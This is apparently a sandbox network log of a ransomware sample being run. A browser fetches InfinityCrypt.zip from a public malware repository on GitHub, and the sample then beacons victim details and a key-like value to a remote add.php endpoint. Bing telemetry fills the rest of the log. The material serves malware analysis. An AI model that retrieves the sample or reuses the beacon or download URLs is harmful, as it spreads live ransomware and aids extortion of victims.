user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1738278233
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: F94A:3E8BA5:BD84A:FCFD7:679BF749
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 1460
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1738278240
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: F94A:3E8BA5:BDB43:FD38A:679BF749
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 536
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1738278249
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: F94A:3E8BA5:BDEAD:FD7D7:679BF750
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 336
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.354131530.1738274631
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1738278263
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: F94A:3E8BA5:BE3A4:FDE38:679BF759
-
Remote address:8.8.8.8:53Request210.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request22.112.82.140.in-addr.arpaIN PTRResponse22.112.82.140.in-addr.arpaIN PTRlb-140-82-112-22-iadgithubcom
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.111.133
-
GEThttps://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:185.199.109.133:443RequestGET /Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: raw.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://github.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
etag: W/"de6390105ad985b4e4a510c12633c654a71a40c5d3991362d976c82096e419a0"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 697C:346F86:28D1D:37173:679BF75B
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:04:11 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600075-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1738274652.517637,VS0,VE166
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: a97278f7db3e62b4875ab0685c097fad088822b3
expires: Thu, 30 Jan 2025 22:09:11 GMT
source-age: 0
content-length: 34300
-
Remote address:8.8.8.8:53Request56.163.245.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request198.187.3.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request181.178.17.96.in-addr.arpaIN PTRResponse181.178.17.96.in-addr.arpaIN PTRa96-17-178-181deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
GEThttp://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7ClQsDNxXx5dg3xXx6uC8xXxXxffxXxhndBxXxwImaxXx%7CMicrosoft%20Windows%2010%20Pro%7C4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134%7C3016Endermanch@InfinityCrypt.exeRemote address:162.55.0.137:80RequestGET /rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7ClQsDNxXx5dg3xXx6uC8xXxXxffxXxhndBxXxwImaxXx%7CMicrosoft%20Windows%2010%20Pro%7C4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134%7C3016 HTTP/1.1
Referer: http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt|Admin|lQsDNxXx5dg3xXx6uC8xXxXxffxXxhndBxXxwImaxXx|Microsoft Windows 10 Pro|4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134|3016
Host: arizonacode.bplaced.net
Connection: Keep-Alive
ResponseHTTP/1.1 403 Forbidden
Server: Apache
X-BP-NSA-REQID: (null) a.14UID=106
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
ETag: "1bbf-5ea8944ceff23"
Accept-Ranges: bytes
Content-Length: 7103
Vary: Accept-Encoding
Keep-Alive: timeout=4, max=500
Content-Type: text/html
-
Remote address:8.8.8.8:53Request137.0.55.162.in-addr.arpaIN PTRResponse137.0.55.162.in-addr.arpaIN PTRmxbplacednet
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request13.153.16.2.in-addr.arpaIN PTRResponse13.153.16.2.in-addr.arpaIN PTRa2-16-153-13deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request22.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestcxcs.microsoft.netIN AResponsecxcs.microsoft.netIN CNAMEcxcs.microsoft.net.edgekey.netcxcs.microsoft.net.edgekey.netIN CNAMEe3230.b.akamaiedge.nete3230.b.akamaiedge.netIN A23.62.195.195
-
Remote address:8.8.8.8:53Requestcxcs.microsoft.netIN AResponsecxcs.microsoft.netIN CNAMEcxcs.microsoft.net.edgekey.netcxcs.microsoft.net.edgekey.netIN CNAMEe3230.b.akamaiedge.nete3230.b.akamaiedge.netIN A23.62.195.195
-
Remote address:88.221.134.250:443RequestPOST /RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-US HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
content-length: 2222
content-type: application/json; charset=UTF-8
cache-control: no-cache
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: private
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 679bf79f860d4a06a8cc3259bec3534a
x-as-setsessionmarket: en-US
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3+8xOcnGCr+/D8s4AH5r9a7yn6YgjJL/yCKxbc9mPNk='; base-uri 'self';
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 30 Jan 2025 22:05:20 GMT
set-cookie: MUID=3AE2278535E26AB40258320134ED6B2D; domain=.bing.com; expires=Tue, 24-Feb-2026 22:05:20 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3AE2278535E26AB40258320134ED6B2D; expires=Tue, 24-Feb-2026 22:05:20 GMT; path=/
set-cookie: _EDGE_S=F=1&SID=3CFDF7EDB65865C20E05E269B75764E4&mkt=en-US; domain=.bing.com; path=/
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 24-Feb-2026 22:05:20 GMT; path=/
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Sat, 30-Jan-2027 22:05:20 GMT; path=/
set-cookie: SRCHUID=V=2&GUID=8B737EB7595C433E87B6392CA431106F&dmnchg=1; domain=.bing.com; expires=Sat, 30-Jan-2027 22:05:20 GMT; path=/
set-cookie: SRCHUSR=DOB=20250130; domain=.bing.com; expires=Sat, 30-Jan-2027 22:05:20 GMT; path=/
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Sat, 30-Jan-2027 22:05:20 GMT; path=/
set-cookie: _SS=SID=3CFDF7EDB65865C20E05E269B75764E4; domain=.bing.com; path=/
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c48f655f.1738274719.9f7666a
-
GEThttps://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktopRemote address:23.62.195.195:443RequestGET /api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/2.0
host: cxcs.microsoft.net
accept-encoding: gzip, deflate
ResponseHTTP/2.0 404
content-length: 26
date: Thu, 30 Jan 2025 22:05:20 GMT
-
Remote address:8.8.8.8:53Request195.195.62.23.in-addr.arpaIN PTRResponse195.195.62.23.in-addr.arpaIN PTRa23-62-195-195deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request250.134.221.88.in-addr.arpaIN PTRResponse250.134.221.88.in-addr.arpaIN PTRa88-221-134-250deploystaticakamaitechnologiescom
-
144 B 132 B 3 3
-
716 B 438 B 6 5
HTTP Request
GET http://bing.com/HTTP Response
301 -
720 B 815 B 6 4
HTTP Request
GET http://www.bing.com/HTTP Response
307 -
72.0kB 426.0kB 448 496
HTTP Request
GET https://www.bing.com/?brdr=1HTTP Response
200HTTP Request
GET https://www.bing.com/favicon.icoHTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=m&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=571ad9d851214d0a8e75236ef6780019&oit=1&cp=1&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=ma&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=d65de2720771480ba3f558ef47ff311b&oit=1&cp=2&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=mal&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=5700783cf98c4d19987f9983973270f5&oit=1&cp=3&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malw&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=b3f9f38d44e64aa8bf49fc191f552807&oit=1&cp=4&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malwa&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=066fdebfec3946e7ab733f7a782d2e15&oit=1&cp=5&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malwar&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e331f79cfad342b8b549fc0dcfb17c29&oit=1&cp=6&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=malware&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=01d9835af3444a7baccd189256057f6a&oit=1&cp=7&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=malware+&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=34b199184c304076aff97dc838d6a0de&oit=1&cp=8&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malware+w&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=516ba68bc9ab42f99f9d6b3c1337c29f&oit=4&cp=9&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malware+wat&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=663a746290a44cb490445886b87a4446&oit=4&cp=11&pgcl=4HTTP Response
200HTTP Request
GET https://www.bing.com/qbox?query=malware+watc&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=9eea3561c3144ffaac009de7b631cb0e&oit=4&cp=12&pgcl=4HTTP Request
GET https://www.bing.com/qbox?query=malware+watch&language=en-US&pt=EdgBox&cvid=0e73f29b17ee4b719f03106da34802ca&ig=e72b39e5b7a84159a6f31e39bd43ee3e&oit=4&cp=13&pgcl=4HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531HTTP Response
200HTTP Request
GET https://www.bing.com/sa/simg/Roboto_Regular.woff2HTTP Request
GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2HTTP Request
GET https://www.bing.com/rp/B6jGHby7hXuEC7enS8xiNSUwqXw.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C6%3A2%2C2%3A3%2C3%3A4%2C4%3A5%2C5%3A6%22}]HTTP Request
GET https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.pngHTTP Response
200HTTP Response
200HTTP Request
POST https://www.bing.com/fd/ls/lsp.aspx?HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:14,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:378,%22BP%22:412,%22CT%22:417,%22IL%22:3},%22ad%22:[-1,-1,1263,609,1263,2918,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01HTTP Request
GET https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.icoHTTP Request
GET https://www.bing.com/rp/xGePBp3s5WxAfPJ_KcDfn09Itck.br.jsHTTP Response
200HTTP Response
200HTTP Response
204HTTP Request
GET https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.4.3/js/widget.js?t=250130HTTP Request
GET https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.pngHTTP Response
200HTTP Request
GET https://www.bing.com/geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=05DFC6CDCE37668C2381D349CFAB67A5HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.5%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1738274627087%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627099%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627100%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627101%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]HTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627102%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627103%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627106%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A503%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SearchHarder%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627108%2C%22Name%22%3A%22ButtonVisible%22%2C%22FID%22%3A%22SearchHarderEntryPoint%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22InitializationStarted%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1738274627110%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A1263%2C%22FID%22%3A%22ViewPortWidth%22%7D%5DHTTP Request
GET https://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&TYPE=Event.ClientInst&DATA=%5B%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22OfferIdMissing%22%2C%22FID%22%3A%22BNPOfferId%22%7D%2C%7B%22SDK%22%3A%22V3-L%22%2C%22T%22%3A%22CI.EffectiveLocation%22%2C%22TS%22%3A1738274627113%2C%22Name%22%3A%22tryWriteEffectiveLocation%22%2C%22FID%22%3A%22EffectiveLocation%22%7D%5DHTTP Request
GET https://r.bing.com/rp/NbA_o5_JH0GEi8eQ-UOtARHo4pE.svgHTTP Request
GET https://r.bing.com/rp/Dl3Mgy5b8mZk0rO25YbvLM3bp7Q.svgHTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=90&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=ODLS.b4a40212-560b-4e49-a115-50716e96c1fa&w=32&h=32&o=6&pid=AdsPlusHTTP Request
GET https://th.bing.com/th?id=OIP.rF5uc7HhZOIGQs0K_sisGgHaEK&w=89&h=108&c=1&bgcl=bbbb97&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=OIP.yPKBYNPkJma2EDDUpaTYCwHaEK&w=89&h=53&c=1&bgcl=8fa6e9&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=OIP.rwUJGzTxe8iMweKS-w-WlAHaHa&w=89&h=53&c=1&bgcl=5b9921&r=0&o=6&pid=5.1HTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=91&pcl=fffffa&o=6&pid=1.2HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2HTTP Request
GET https://th.bing.com/th?id=OIP.tr6XvvcoRBeW4TBXKIdMNgHaHa&w=80&h=80&c=7&qlt=80&o=6&pid=13.1HTTP Request
GET https://th.bing.com/th?id=ODLS.3bc1a8a9-5d72-433e-aea7-1fd5fa3fea80&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=OIP.elucaXozpAzop1bZYDv0dgHaDt&w=80&h=80&c=1&vt=10&bgcl=7bc899&r=0&o=6&pid=5.1HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://th.bing.com/th?id=ODLS.c7e742a7-e059-442e-80ab-53e3057edff4&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2HTTP Request
